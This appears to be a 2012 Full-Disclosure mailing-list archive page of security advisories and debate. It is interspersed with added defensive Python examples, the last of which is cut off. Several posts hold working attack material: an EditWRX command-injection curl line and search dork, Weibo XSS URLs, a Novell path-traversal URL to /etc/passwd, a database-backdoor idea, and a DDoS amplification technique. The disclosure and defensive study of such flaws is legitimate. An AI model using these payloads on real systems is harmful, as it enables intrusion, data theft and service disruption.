[Full-disclosure] [TEHTRI-Security] 0days at HITB Amsterdam 2012

2012-02-13 Thread Laurent OUDOT at TEHTRI-Security
Dear contacts,

During the next Hack In The Box event in Amsterdam (22nd and 23rd May
2012), TEHTRI-Security will come again, and propose an updated training
called *Hunting Web Attackers* with offensive cyber weapons shared with
our students.

For example, during the final live hacking exercise, we will show how to
strike back against a team of attackers, thanks to multiple kinds of
0days (hacking: web applications + client-side + network, etc).

Beyond our cyber-weapons against kits used by cyber-criminals (0days
against Zeus, Crimepack, etc), our students will also get more hacking
tricks that can make the difference during asymmetric cyber conflicts.

Examples? We will share 0days that can help bypass a firewall, in
order to pown a remote evil LAN used by cyber-criminals (live demo
shared with students in our lab: bypassing an updated Cisco product).

To get our hacking tricks, do not hesitate to register soon, while seats
are still available. 100% of seats were taken last time.

_HITB Training link_
http://conference.hitb.org/hitbsecconf2012ams/tech-training-1-hunting-web-attackers/

Moreover, if you're interested in *mobile hacking*, we wrote some
lines related to vulnerabilities in the Gmail App on iPhone/iPad. Feel
free to read our thoughts/findings on our blog:

_TEHTRIS Blog link_
http://blog.tehtri-security.com/2012/01/gmail-app-security-issues-on.html

We essentially saw that the famous GX cookie was written in clear text
on an iOS device, while Apple suggests using Keychain capabilities to
store sensitive information (see Apple devel doc).

According to us, App vendors should do offensive pentests against mobile
applications. This year, we found plenty of vulnerabilities in iOS
apps or MDM infrastructure (hacking thousands of devices).
And we are not the only company feeling this big trouble in the Force,
for IT Security and Mobile stuff.

Best regards,

Laurent Estieux (CTO) & Laurent Oudot (CEO)
TEHTRI-Security - This is not a Game
http://www.tehtri-security.com/
@tehtris

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-13 Thread Derek
secure_CC_POS


Thanks
Derek


On 13/02/2012, at 22:17, Alex Buie ab...@kwdservices.com wrote:

 Just morbidly curious, what did you use for the SSID?
 
 On Feb 12, 2012 5:31 PM, Derek de...@madrock.net wrote:
 They should at least consider providing an option to disable the static pin
 only, or disable it after an hour if the feature is activated by the user.
 
 Seems to be something that could be included in a future firmware update.
 
 For a vendor to provide another mechanism for a user to get remotely hacked
 (within wireless TX/RX range) and not address it in a reasonable amount of
 time exposes the less technical user, who it was intended to help in the
 first place.
 
 It would be interesting to see if this feature went through a technical
 security risk assessment and if so, how the static pin was rationalised for
 public release.
 
 I set up an isolated vulnerable device and had attack traffic within 2 days of
 it being activated. I did make the SSID very attractive, but the war drivers
 are certainly getting out of the house again.
 
 
 Thanks
 Derek
 
 
 On 13/02/2012, at 1:47, Rob Fuller jd.mu...@gmail.com wrote:
 
  I've tested 6 models of Linksys, all of them appear to disable WPS
  completely as soon as a single wireless setting is set. I assume this
  would be the reason Cisco/Linksys aren't putting much stock in
  'fixing' it further. If anyone has any experience to contradict this
  or has a modification to current tools to circumvent what I've
  perceived as disabled, I, as I'm sure Craig, would be very interested.
 
  --
  Rob Fuller | Mubix
  Certified Checkbox Unchecker
  Room362.com | Hak5.org
 
 
 
  On Sat, Feb 11, 2012 at 4:23 PM,  farthva...@hush.ai wrote:
  _
  Use Tomato-USB OS on them.
  _
 
  Besides you void warranty...
  list of DD-WRT Supported routers:
 
   E1000         supported
   E1000 v2      supported
   E1000 v2.1    supported
   E1200 v1      ???
   E1200 v2      ???
   E1500         ???
   E1550         ???
   E2000         supported
   E2100L        supported
   E2500         not supported
   E3000         supported
   E3200         supported
   E4200 v1      not supported yet
   E4200 v2      not supported
   M10
   M20
   M20 v2
   RE1000
   WAG120N       not supported
   WAG160N       not supported
   WAG160N v2    not supported
   WAG310G       not supported
   WAG320N       not supported
   WAG54G2       not supported
   WAP610N       not supported
   WRT110        not supported
   WRT120N       not supported
   WRT160N v1    supported
   WRT160N v2    not supported
   WRT160N v3    supported
   WRT160NL      supported
   WRT310N v1    supported
   WRT310N v2    not supported yet
   WRT320N       supported
   WRT400N       supported
   WRT54G2 v1    supported
   WRT54G2 v1.3  supported
   WRT54G2 v1.5  not supported
   WRT54GS2 v1   supported
   WRT610N v1    supported
   WRT610N v2    supported
   X2000         not supported
   X2000 v2      not supported
   X3000         not supported
 
  _
 
  Fixing?  Heh.
 
  Aside from rate limiting WPS, there isn't much of a fix, and you can't 
  turn it off either.
  _
 
  What about removing WuPS entirely?
 
  WuPS is a total failure because:
 
   1. Even if everything is fine, 8 digits long is very weak, because once you
   get the PIN (after 7 months to 2 years, for example), you are completely pwned.
  
   2. The PIN is fixed; you can't change it to a longer number or maybe a
   string like omgponnies.
  
   3. Setting up a WPA2 password manually is a piece of cake (even with
   keypad-only cell phones); if some people are lazy, you don't have to
   weaken the security of a strong protocol.
 
  Farth Vader
 

Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-13 Thread Alex Buie
Just morbidly curious, what did you use for the SSID?

[Full-disclosure] EditWRX CMS Remote Code Execution + Admin Bypass Zero Day

2012-02-13 Thread chippy

 
VULN_
EditWRX CMS Remote Code Execution + Admin Bypass Zero Day
 
NFO__
EditWRX is vulnerable to remote code execution through mishandling
of open() in the downloader, which can read in piped commands.
Despite the downloader being an administrative component, a login
is not required to call the function, and therefore no access is
required to exploit this vulnerability.
 
ZDAY_
Google: inurl:editwrx/wrx.cgi
RXE: curl http://example.com/editwrx/wrx.cgi?download=;uname%20-a|
Found by: chippy1337
 
GREETZ___
Robert Cavanaugh
Ryan Cleary
Jasper Lingers
Carlos1337 (dos cero dia!)
MASTER HACKER
FLOOD HACKER
DR TIGER
WANG HACKER
DDOS KING
Sabu, Havij Professional
D0xbin



[Full-disclosure] Arbitrary DDoS PoC

2012-02-13 Thread Lucas Fernando Amorim
With the recent wave of DDoS, a concern that was not taken is the model
where the zombies were not compromised by a Trojan. In the standard
modeling of a DDoS attack, the machines are purchased, usually in a VPS,
or are obtained through Trojans, thus forming a botnet. But the
arbitrary shape doesn't need to acquire a collection of computers.
Programs, servers and protocols are used to arbitrarily make requests on
the target. P2P programs are especially vulnerable; DNS, internet
proxies, and many sites that make requests on behalf of users, like
Facebook or W3C, also are.

Precisely, I made a proof-of-concept script of 60 lines hitting most of the
HTTP servers on the Internet, even if they have protections like
mod_security or mod_evasive. This can be found at this link [1] on GitHub.
The solution to the problem depends only on the reformulation of
protocols and on limits on the number of concurrent and total requests
by proxies and programs for a given site, returning a cached copy of the
last request when the limit is exceeded.

[1] https://github.com/lfamorim/barrelroll

Cheers,
Lucas Fernando Amorim
http://twitter.com/lfamorim

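Lucas's proposed mitigation, a per-site limit on concurrent and total requests with the cached copy of the last response returned once the limit is hit, written out as an added Python example; it is not code from the barrelroll repository or from anyone in the thread, and the fetch function, host names and budget values are constructed.

```python
"""Per-target request budget for a service that fetches URLs on behalf of users.

Constructed example: a link-preview or validator style service caps how often
it will contact any one target host, and answers over-budget requests from the
cached copy of the last response for that URL instead of fetching again, so
the service cannot be turned into an amplifier while its users still get data.
"""
import threading
import time
from collections import defaultdict, deque
from dataclasses import dataclass, field
from typing import Callable, Deque, Dict, List, Optional, Tuple
from urllib.parse import urlsplit


class BudgetExceeded(Exception):
    """Host is over budget and no cached copy exists; a web front end would answer 429."""


@dataclass
class Budget:
    max_concurrent: int = 4        # in-flight fetches per target host
    max_per_window: int = 20       # fetches started per target host per sliding window
    window_seconds: float = 60.0


@dataclass
class _HostState:
    in_flight: int = 0
    started: Deque[float] = field(default_factory=deque)  # start times inside the window


class GuardedFetcher:
    def __init__(self, fetch: Callable[[str], bytes], budget: Optional[Budget] = None,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self._fetch = fetch               # the real HTTP client in production, injected here
        self._budget = budget or Budget()
        self._clock = clock               # injectable so the sliding window can be tested
        self._hosts: Dict[str, _HostState] = defaultdict(_HostState)
        self._cache: Dict[str, bytes] = {}   # last successful response per exact URL
        self._lock = threading.Lock()

    @staticmethod
    def _host(url: str) -> str:
        # The budget is per target host: different paths on one server still cost
        # that server, so they share one counter.
        return (urlsplit(url).hostname or "").lower()

    def _over_budget(self, st: _HostState, now: float) -> bool:
        b = self._budget
        while st.started and now - st.started[0] >= b.window_seconds:
            st.started.popleft()          # drop starts that fell out of the window
        return st.in_flight >= b.max_concurrent or len(st.started) >= b.max_per_window

    def get(self, url: str) -> Tuple[bytes, bool]:
        """Return (body, served_from_cache); never contacts a host beyond its budget."""
        with self._lock:
            st = self._hosts[self._host(url)]
            now = self._clock()
            if self._over_budget(st, now):
                if url in self._cache:
                    return self._cache[url], True
                raise BudgetExceeded(f"{self._host(url)} is over its request budget")
            st.in_flight += 1
            st.started.append(now)
        try:
            body = self._fetch(url)
        finally:
            with self._lock:
                st.in_flight -= 1
        with self._lock:
            self._cache[url] = body
        return body, False


def demo() -> Dict[str, int]:
    """Drive the fetcher with a fake clock and a counting fake fetch (all constructed)."""
    clock = [0.0]
    contacted: List[str] = []

    def fake_fetch(url: str) -> bytes:
        contacted.append(url)             # one entry each time a target is really hit
        return b"response for " + url.encode()

    budget = Budget(max_concurrent=2, max_per_window=3, window_seconds=10.0)
    fetcher = GuardedFetcher(fake_fetch, budget, clock=lambda: clock[0])
    target = "http://target.example/expensive-report"

    for _ in range(3):
        fetcher.get(target)               # three fresh fetches exhaust the window
    _, cached = fetcher.get(target)       # the fourth is answered from the cached copy
    try:
        fetcher.get("http://target.example/never-seen")  # over budget, nothing cached
        refused = 0
    except BudgetExceeded:
        refused = 1
    fetcher.get("http://other.example/")  # a different host has its own budget
    clock[0] = 10.0                       # window slides; target may be fetched again
    _, cached_later = fetcher.get(target)
    return {"contacted": len(contacted), "cached": int(cached),
            "refused": refused, "cached_after_window": int(cached_later)}


if __name__ == "__main__":
    print(demo())
```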


[Full-disclosure] XSS vulnerability in WEIBO.COM

2012-02-13 Thread Yuping Li
Information
-
Name :  XSS  Vulnerability in WEIBO.COM
Vendor Homepage :  http://corp.sina.com.cn/eng/sina_index_eng.htm
Vulnerability Type :  Cross-Site Scripting
Severity :  High
Researcher :  Yuping Li at ADLab of Beijing Leadsec Technology Co., Ltd


Description
-
WEIBO.COM is the largest twitter-like website in China, which claimed to
have more than 200 million users in 2011. It was operated by SINA
Corporation (USA, Nasdaq: Sina), which is an online media company for China
and Chinese Community around the world. Weibo is one of SINA's four major
business lines.


Details
-
ADLab (Leadsec) has discovered a vulnerability in WEIBO.COM which can be
exploited to perform cross-site scripting attacks, potentially affecting a
large number of users.

Example PoC urls are as follows:

http://weibo.com/mobile/cellphone?ky=iphone<script>alert('test')</script>&refer=help

Actually, the refer parameter can be removed:

http://weibo.com/mobile/cellphone?ky=</title><script>alert('test')</script>

Successful exploitation of this vulnerability requires that the victim is
logged in to the vulnerable website.


Solution
-
Fix the code.


Advisory Timeline

06/01/2012 - First indirect contact: Sent the vulnerability details
09/01/2011 - Vulnerability partially fixed, still vulnerable
12/01/2012 - Second direct contact: Sent the vulnerability details
13/02/2012 - Vulnerability Released


Credits
-
Attack and Defense Lab, Beijing Leadsec Technology Co., Ltd (
http://www.leadsec.com.cn/en/index.html)


References
-
Vendor Url : http://corp.sina.com.cn/eng/sina_index_eng.htm


Disclaimer
-
The information provided in this advisory is provided as it is without any
warranty. Leadsec disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. Leadsec or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Leadsec or its suppliers have been advised of the
possibility of such damages. Some countries do not allow the exclusion or
limitation of liability for consequential or incidental damages so the
foregoing limitation may not apply. Any modified copy or reproduction,
including partial usage, of this file requires authorization from Leadsec.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are reserved by
Leadsec or its suppliers.

Copyright © 2012 | Beijing Leadsec Technology Co., Ltd

[Full-disclosure] Skype v. 5.x.x - information disclosure

2012-02-13 Thread Osama Bin Error
Title:
==
Skype v. 5.x.x - information disclosure

Date:
=
2012-02-13

Introduction:
=
Skype is a proprietary voice-over-Internet Protocol service and
software application.

Abstract:
=
We have discovered improper chat log handling, which results in the logs
remaining accessible even if the user has enabled the "no history" option
under "Keep history for" in the settings, or has even destroyed them manually
with the "Clear history" button.

Report-Timeline:

2012-02-13: Public Disclosure

Status:

Published

Exploitation-Technique:
===
Local

Severity:
=
Low

Details:

As mentioned in the Skype FAQ
(https://support.skype.com/en-gb/faq/FA140/Managing-your-privacy-settings-Windows):
You can choose how long to keep your conversation history for, or
delete it altogether.
1. To change your history settings, in Skype from the menu bar click
Skype > Privacy.
2. Below "Keep history for", click on the drop-down list and select the
amount of time you would like your history to be saved for.
Choose from forever, 3 months, 1 month, 2 weeks or no history at all.
3. To delete your conversation history, click "Clear history". This
removes your entire history, including instant messages, calls,
voicemails, text messages, sent and received files. If you delete your
conversation history, you cannot recover it.

This sounds safe, but in fact Skype stores all incoming and outgoing
chat messages in a local sqlite3 DB (file main.db, table Messages), in
plain text. Even if the "Keep history for: no history" option in
Settings > Security is enabled, Skype writes all your data into the Messages
table, but executes delete * from Messages after program exit. This
command destroys the messages at the logical level in the DB, but in fact, at
the physical level, all the message data stays alive (the blocks in the DB file
are only marked as destroyed) and can simply be recovered, even with a text
editor (as mentioned above, it is stored in plain text).

Proof of Concept:
=
In Windows XP, go to C:\Documents and Settings\%user
name%\Application Data\Skype\%Skype user name% and open file main.db
with text editor. All the ducks inside.

Credits:

Anonymous

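The gap between logical and physical deletion described above, reproduced as an added Python example (not the advisory's or Skype's code) on a throwaway database: the same DELETE run with SQLite's secure_delete pragma, or followed by VACUUM, leaves no plaintext in the file. The Messages table name comes from the advisory; the marker string is constructed.

```python
"""Logical versus physical deletion in a SQLite message store.

Constructed example: a throwaway database with a Messages table receives one
message, which is then deleted. The raw file is scanned for the plaintext the
way an examiner would with a text editor or `strings`, with and without
SQLite's secure_delete pragma, and after a VACUUM.
"""
import os
import re
import sqlite3
import tempfile
from typing import Dict, List

# Constructed marker string; nothing else in the file can contain it.
NEEDLE = "constructed-secret-message-0c9f1e2d"


def printable_runs(data: bytes, min_len: int = 8) -> List[str]:
    """Return printable ASCII runs of at least min_len bytes (what `strings` prints)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def plaintext_survives(secure_delete: bool, vacuum: bool = False) -> bool:
    """Insert NEEDLE into Messages, delete it, report whether it is still in the file."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    try:
        con = sqlite3.connect(path)
        # Set the pragma explicitly: some builds (e.g. macOS system SQLite) default it ON.
        con.execute("PRAGMA secure_delete = %s" % ("ON" if secure_delete else "OFF"))
        con.execute("CREATE TABLE Messages (id INTEGER PRIMARY KEY, body TEXT)")
        con.execute("INSERT INTO Messages (body) VALUES (?)", (NEEDLE,))
        con.commit()
        # Logical deletion: the row disappears from SELECT, but with secure_delete OFF
        # SQLite only marks the space reusable and leaves the old bytes in the page.
        con.execute("DELETE FROM Messages")
        con.commit()
        assert con.execute("SELECT COUNT(*) FROM Messages").fetchone()[0] == 0
        if vacuum:
            con.execute("VACUUM")        # rebuilds the file from live rows only
        con.close()
        with open(path, "rb") as f:
            # The run may carry a cell-header byte in front of the text, so test containment.
            return any(NEEDLE in run for run in printable_runs(f.read()))
    finally:
        os.remove(path)


def summary() -> Dict[str, bool]:
    """Run the three variants; True means the deleted message is still readable."""
    return {
        "plain DELETE": plaintext_survives(secure_delete=False),
        "DELETE with secure_delete": plaintext_survives(secure_delete=True),
        "DELETE then VACUUM": plaintext_survives(secure_delete=False, vacuum=True),
    }


if __name__ == "__main__":
    for variant, survives in summary().items():
        print(f"{variant:28s} plaintext recoverable: {survives}")
```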


Re: [Full-disclosure] Trustwave and Mozilla

2012-02-13 Thread decoder
Hi Jeffrey,

On 02/12/2012 11:54 AM, Jeffrey Walton wrote:
 For what its worth, pinning the certificate can usually remediate
 these sorts of MitM attacks, but Mozilla subverted it:
 http://ssl.entrust.net/blog/?p=615.

Please take a look at our security roadmap (
https://wiki.mozilla.org/Security/Roadmap ). You will see that CA
pinning is a P1 feature, which means it is actively being worked on. In
fact our update service already does some sort of pinning (for securely
retrieving updates); it's just that failures are not reported right now.
It's possible that this sort of pinning could be extended to other
services and also alert the user (and/or us, if that is possible somehow).


Cheers,

Chris




Re: [Full-disclosure] Arbitrary DDoS PoC

2012-02-13 Thread Gage Bystrom
Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent
server with that using a single box. Sending your request through multiple
proxies does not magically increase the resource usage of the target; it's
still your output power vs their input pipe. Sure it gives a slight boost
in anonymity and obfuscation but does not actually increase effectiveness.
It would even decrease effectiveness because you bear the burden of having
to send to a proxy, giving them ample time to recover from a given request.

Even if you look at it as a tactic to bypass blacklisting, you still aren't
going to overwhelm the server. That means you need more pawns to do your
bidding. This creates a bit of a problem however as then all your slaves
are running through a limited selection of proxies, reducing the amount of
threats the server needs to blacklist. The circumvention is quite obvious,
which is to not utilize proxies for the pawns and rely on sheer numbers
and/or superior resource exhaustion methods.

Re: [Full-disclosure] Skype v. 5.x.x - information disclosure

2012-02-13 Thread Mario Vilas
Good find. I think it should also be possible to disable the delete
* command with triggers, as a nice way to backdoor the database
(almost non intrusive compared with installing rogue plugins, and the
user isn't likely to ever find out).




-- 
“There's a reason we separate military and the police: one fights the
enemy of the state, the other serves and protects the people. When the
military becomes both, then the enemies of the state tend to become
the people.”



Re: [Full-disclosure] Arbitrary DDoS PoC

2012-02-13 Thread adam
I have to admit that I've only read the posts here, haven't actually
followed the link, but in response to Gage:

It entirely depends on how it's being done, specifically: what
services/applications are being targeted and in what way. If he's proxying
through big servers such as those owned by Facebook, Google, Wikipedia,
etc: then it definitely does make a difference. You're assuming that his
network speed would be the bottleneck, but to make that assumption, you
first have to assume that he's actually waiting around for response data.

Maybe it's too early to convey this in an understandable way, I don't know.
An example scenario that would be effective though: imagine that you run a
web server, also imagine that there's a resource (CPU/bandwidth) intensive
script/page on that server. For the sake of discussion, let's assume that
my home internet speed is 1/10 of your server. We can also probably assume
that your server's network speed is 1/10 of Google's. If I can force
Google's server to request that page, that automatically puts me at an
advantage (especially if I close the connection before Google can send the
response back to me).

Even if you're correct about his particular script, the logic behind your
response is flawed. In the above example, one could use multithreading to
cycle requests to your server through Google, Facebook, Wikipedia, whoever.
As soon as the request has been sent, the connection could be terminated.
If that for some reason wouldn't work, the script could wait until one byte
is received (e.g. the "2" in "200 OK") and close the connection then. At
that point, the bandwidth/resources would have already been used.

The bottom line is that you could easily use the above concepts (and likely
what the OP has designed) to overpower a server/service while using very
little resources of your own. It's all circumstantial anyway though. My
overall point, specifics aside, is that being able to use Google or
Facebook's resources against a target is definitely beneficial and has all
kinds of advantages.


[Full-disclosure] [ MDVSA-2012:018 ] mozilla-thunderbird

2012-02-13 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:018
 http://www.mandriva.com/security/
 ___

 Package : mozilla-thunderbird
 Date: February 13, 2012
 Affected: 2011.
 ___

 Problem Description:

 Use-after-free vulnerability in Mozilla Firefox 10.x before 10.0.1,
 Thunderbird 10.x before 10.0.1, and SeaMonkey 2.7 allows remote
 attackers to cause a denial of service (application crash) or
 possibly execute arbitrary code via vectors that trigger failure of
 an nsXBLDocumentInfo::ReadPrototypeBindings function call, related
 to the cycle collector's access to a hash table containing a stale
 XBL binding (CVE-2012-0452).
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0452
 advisories/template/2012/MDVSA-2012-017_firefox
 ___

 Updated Packages:

 Mandriva Linux 2011:
 

Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-13 Thread Dan Kaminsky

 Steve while he's often derided goes into this very well.  Many cisco's
 only stop advertising wps when it is off but wps actually still
 exists...which means they are still easily hackable.


Have you directly confirmed a WPS exchange can occur even on devices that
aren't advertising support?  That would indeed be a quick and dirty way to
turn the feature off.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerability in Novell website.

2012-02-13 Thread Marcus Meissner
Hi,

We have escalated this within Novell and the CRS servlet got removed
last week on the day of the report.

Ciao, Marcus

On Mon, Feb 13, 2012 at 04:36:44PM +0100, Team wrote:
   
 
 Hello :-) 
 
 I sent email stating the problem for the company,
 waited a few days and got no response, so I'm making the vulnerability
 public: 
 
 Scan date: 2-2-2012 13:33:54
 Domain: http://www.novell.com/ [1]
 Server: Apache
 IP: 130.57.5.25
 ...
 
 
 | LFI:
 | [+] Vul[1] [LFI]
 http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00
 

Re: [Full-disclosure] Trustwave and Mozilla

2012-02-13 Thread Nick Boyce
On Sun, Feb 12, 2012 at 10:54 AM, Jeffrey Walton noloa...@gmail.com wrote:

https://www.infoworld.com/d/security/trustwave-admits-issuing-man-in-the-middle-digital-certificate-185972

 In case folks are interested in the following Mozilla's response to
 active MitM attacks that were facilitated by Trustwave, the bug report
 is here: http://bugzilla.mozilla.org/show_bug.cgi?id=724929.


Can anyone confirm that Trustwave CA certificates in the local Mozilla
certificate store are the ones with names containing the word SecureTrust?

I want to disable Trustwave CAs on all my local systems, but am not certain
which are the relevant ones.  For some benighted reason, the word
Trustwave is not present in any of the certificate names in the FF
certificate store on WinXP or Debian (Iceweasel).  Ironically of course,
the word trust appears everywhere :)

I found a page at mozilla.org which appears to show all CAs included with
FF, and that Trustwave certificates are labelled SecureTrust :
http://www.mozilla.org/projects/security/certs/included/
but I would like confirmation from Someone Who Knows Better.

Be advised: the above page appears to be some kind of .. [recoils in
horror] .. XML which doesn't render properly on WinXP, but renders fine on
Debian Linux.  Maybe there's some XSL needed somewhere.

Cheers
Nick
-- 
XML is like violence. If it doesn't solve the problem, use more.

Re: [Full-disclosure] Trustwave and Mozilla

2012-02-13 Thread Nick Boyce
On Mon, Feb 13, 2012 at 4:18 PM, Nick Boyce nick.bo...@gmail.com wrote:


 http://www.mozilla.org/projects/security/certs/included/

 Be advised: the above page appears to be some kind of .. [recoils in
 horror] .. XML which doesn't render properly on WinXP, but renders fine on
 Debian Linux.  Maybe there's some XSL needed somewhere.


OT: that problem was actually caused by having XSLT disabled in NoScript
options on the WinXP box - sorry for the misdirection.

Nick
-- 
Leave the Olympics in Greece, where they belong.

Re: [Full-disclosure] Arbitrary DDoS PoC

2012-02-13 Thread Gage Bystrom
Absolutely and that's partly my point. The methods you describe are nigh
exactly how modern general ddos techniques work, which is not how this
works.

One problem is you can't use Facebook or Google as an open proxy like
you're saying because 1.) It assumes you can force Google or Facebook to
make multiple requests for just one of your requests, else you are still
being stuck to how much you can output vs how much they can take. Just
because you can tweak how much you can send does not change the basic
principle behind this and 2.) It no longer becomes a general method because
you must abuse a particular flaw in a particular service to get it to use
its resources to flood the targets resources.

Not trying to really argue your examples, I'm just saying his script and
his bug report or whatever you call it is terribly ineffective as a
general method compared to pretty standard techniques like you described,
and does not abuse any implementation or protocol to be a specific flaw a
la the Apache dos bug a few months ago. It's like he's claiming he found
the new smurf attack when all the attack is a script calling curl through a
proxy, torrenting the latest distro install disk is a bigger DoS
technique than this.
On Feb 13, 2012 5:48 AM, adam a...@papsy.net wrote:

 I have to admit that I've only read the posts here, haven't actually
 followed the link, but in response to Gage:

 It entirely depends on how it's being done, specifically: what
 services/applications are being targeted and in what way. If he's proxying
 through big servers such as those owned by Facebook, Google, Wikipedia,
 etc: then it definitely does make a difference. You're assuming that his
 network speed would be the bottleneck, but to make that assumption, you
 first have to assume that he's actually waiting around for response data.

 Maybe it's too early to convey this in an understandable way, I don't
 know. An example scenario that would be effective though: imagine that you
 run a web server, also imagine that there's a resource (CPU/bandwidth)
 intensive script/page on that server. For the sake of discussion, let's
 assume that my home internet speed is 1/10 of your server. We can also
 probably assume that your server's network speed is 1/10 of Google's. If I
 can force Google's server to request that page, that automatically puts me
 at an advantage (especially if I close the connection before Google can
 send the response back to me).

 Even if you're correct about his particular script, the logic behind your
 response is flawed. In the above example, one could use multithreading to
 cycle requests to your server through Google, Facebook, Wikipedia, whoever.
 As soon as the request has been sent, the connection could be terminated.
 If that for some reason wouldn't work, the script could wait until one byte
 is received (e.g. the 2 in 200 OK) and close the connection then. At
 that point, the bandwidth/resources would have already been used.

 The bottom line is that you could easily use the above concepts (and
 likely what the OP has designed) to overpower a server/service while using
 very little resources of your own. It's all circumstantial anyway though.
 My overall point, specifics aside, is that being able to use Google or
 Facebook's resources against a target is definitely beneficial and has all
 kinds of advantages.

 On Mon, Feb 13, 2012 at 7:17 AM, Gage Bystrom themadichi...@gmail.com wrote:

 Uhh...looks pretty standard boss. You aren't going to DoS a halfway
 decent server with that using a single box. Sending your request through
 multiple proxies does not magically increase the resource usage of the
 target, its still your output power vs their input pipe. Sure it gives a
 slight boost in anonymity and obfuscation but does not actually increase
 effectiveness. It would even decrease effectiveness because you bear the
 burden of having to send to a proxy, giving them ample time to recover from
 a given request.

 Even if you look at it as a tactic to bypass blacklisting, you still
 aren't going to overwhelm the server. That means you need more pawns to do
 your bidding. This creates a bit of a problem however as then all your
 slaves are running through a limited selection of proxies, reducing the
 amount of threats the server needs to blacklist. The circumvention is quite
 obvious, which is to not utilize proxies for the pawns and rely on sheer
 numbers and/or superior resource exhaustion methods.
  On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br
 wrote:

 With the recent wave of DDoS, a concern that was not taken is the model
 where the zombies were not compromised by a Trojan. In the standard
 modeling of DDoS attack, the machines are purchased, usually in a VPS,
 or are obtained through Trojans, thus forming a botnet. But the
 arbitrary shape doesn't need acquire a collection of computers.
 Programs, servers and protocols are used to arbitrarily make requests on
 the target. P2P 

[Full-disclosure] [SECURITY] [DSA 2408-1] php5 security update

2012-02-13 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2408-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
February 13, 2012  http://www.debian.org/security/faq
- -

Package: php5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-1072 CVE-2011-4153 CVE-2012-0781 CVE-2012-0788 
 CVE-2012-0831 

Several vulnerabilities have been discovered in PHP, the web scripting 
language. The Common Vulnerabilities and Exposures project identifies 
the following issues:

CVE-2011-1072

   It was discovered that insecure handling of temporary files in the PEAR
   installer could lead to denial of service.

CVE-2011-4153

   Maksymilian Arciemowicz discovered that a NULL pointer dereference in
   the zend_strndup() function could lead to denial of service.

CVE-2012-0781

   Maksymilian Arciemowicz discovered that a NULL pointer dereference in
   the tidy_diagnose() function could lead to denial of service.

CVE-2012-0788

   It was discovered that missing checks in the handling of PDORow
   objects could lead to denial of service.

CVE-2012-0831

   It was discovered that the magic_quotes_gpc setting could be disabled
   remotely.

This update also addresses PHP bugs, which are not treated as security issues
in Debian (see README.Debian.security), but which were fixed nonetheless:
CVE-2010-4697, CVE-2011-1092, CVE-2011-1148, CVE-2011-1464, CVE-2011-1467
CVE-2011-1468, CVE-2011-1469, CVE-2011-1470, CVE-2011-1657, CVE-2011-3182
CVE-2011-3267

For the stable distribution (squeeze), this problem has been fixed in
version 5.3.3-7+squeeze8.

For the unstable distribution (sid), this problem has been fixed in
version 5.3.10-1.

We recommend that you upgrade your php5 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org


Re: [Full-disclosure] Arbitrary DDoS PoC

2012-02-13 Thread Sanguinarious Rose
Ah what a wonderful gem of pure and real research into today's upcoming
threats. Today is the day we learn to phear sites like xroxy.com
because God forbid some of those silly kids using their 9001 proxies
from their 56k dial-ups will over-run google, youtube, facebook, and
the world! Dear God what will we do?!?!? When will it end! Think of
the cute kittens you deprive us of evil proxy hackers!

Today is the day I learned hackers can cast magick upon outgoing
packets through proxies to somehow make them more bigger. I propose
these are some kind of Christian hackers with God on their side to
manipulate the very foundational laws of physics and electricity!

Excuse me Mr. Amorim but what God alas do you pray to for this? Is it
some kind of Christian Magick?

On Sun, Feb 12, 2012 at 9:09 AM, Lucas Fernando Amorim
lf.amo...@yahoo.com.br wrote:
 With the recent wave of DDoS, a concern that was not taken is the model
 where the zombies were not compromised by a Trojan. In the standard
 modeling of DDoS attack, the machines are purchased, usually in a VPS,
 or are obtained through Trojans, thus forming a botnet. But the
 arbitrary shape doesn't need acquire a collection of computers.
 Programs, servers and protocols are used to arbitrarily make requests on
 the target. P2P programs are especially vulnerable, DNS, internet
 proxies, and many sites that make requests of user like Facebook or W3C,
 also are.

 Precisely I made a proof-of-concept script of 60 lines hitting most of
 HTTP servers on the Internet, even if they have protections likely
 mod_security, mod_evasive. This can be found on this link [1] at GitHub.
 The solution of the problem depends only on the reformulation of
 protocols and limitations on the number of concurrent requests and
 totals by proxies and programs for a given site, when exceeded returning
 a cached copy of the last request.

 [1] https://github.com/lfamorim/barrelroll

 Cheers,
 Lucas Fernando Amorim
 http://twitter.com/lfamorim

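The mitigation Lucas proposes in the quoted post (caps on concurrent and total requests per proxy or program, with a cached copy of the last request served once a cap is exceeded) can be sketched as a small admission controller. This is an added example, not the barrelroll script or any code from the thread; the class name, caps and addresses are assumptions, and the budget is keyed on the connecting peer, which for relayed traffic is the proxy itself, so one relay's users share a single budget.

```python
"""Per-source request limiter that falls back to a cached copy.

Added example, not the poster's barrelroll script or any code from the
thread. It sketches the mitigation proposed in the quoted post: cap the
concurrent and total requests a single source (proxy or program) may make
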